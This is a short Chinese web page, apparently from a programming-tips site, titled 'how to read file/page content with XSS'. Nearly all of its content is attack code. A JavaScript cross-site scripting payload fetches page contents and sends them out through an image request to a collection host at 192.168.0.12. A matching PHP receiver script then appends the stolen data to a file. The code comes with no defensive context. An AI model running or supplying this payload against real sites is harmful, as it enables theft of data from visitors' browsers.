如何用xss文件页面内容读取
-
如何用xss文件页面内容读取
js:
document.body.addBehavior("#default#Download");
var mycars = new Array();
mycars[0] = "l.htm";
mycars[1] = "y.htm";for (x in mycars )
{
if(document.body.startDownload(mycars[x],GetData)){GetData(source);
}
}
function GetData(source)
{
txt=escape(source);
getReaded(txt);
}function getReaded(usr) {
var newimg = new Image();
newimg.src="http://192.168.0.12/style.php?key="+"\n"+"\n"+usr+"\n"+"\n";}
php:<?php
header('Content-Type:text/html;charset=utf-8');
function unescape($str) {
$str = rawurldecode($str);
preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r);
$ar = $r[0];
foreach($ar as $k=>$v) {
if(substr($v,0,2) == "%u")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4)));
elseif(substr($v,0,3) == "&#x")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1)));
elseif(substr($v,0,2) == "&#") {
$ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1)));
}
}
return join("",$ar);
}$file="news.html";
$_GET['key']=unescape($_GET['key']);fputs(fopen($file,'a+'),$_GET['key']);
?>
相关视频
相关阅读 我的世界手机版药水插件 我的世界手机版药水jsnode.js环境搭建教程 node.js怎么进行环境搭建我的世界手机版js函数表大全JS文件中的中文在网页上显示为乱码解决方法(带缩略图版)JS图片切换代码js鼠标滑过切换层效果代码下载jsp统计在线人数代码jsp技巧大全
- 文章评论
-
热门文章
JS文件中的中文在网页
最新文章
JS文件中的中文在网页关于一些Play 1.0.1资
JAVA中抽象类与接口的区别Java技巧:关于Cookie的操作JAVA AWT图形用户界面设计巧用Java将Word转换为Html网页文件
人气排行 JS文件中的中文在网页上显示为乱码解决方法怎么为Java程序添加漂亮背景图片代码JAVA AWT图形用户界面设计怎样获取java线程中信息JS简介及特点Java面向对象编程学习总结js鼠标滑过切换层效果代码下载教你java使用回调和线程处理响应全过程
查看所有0条评论>>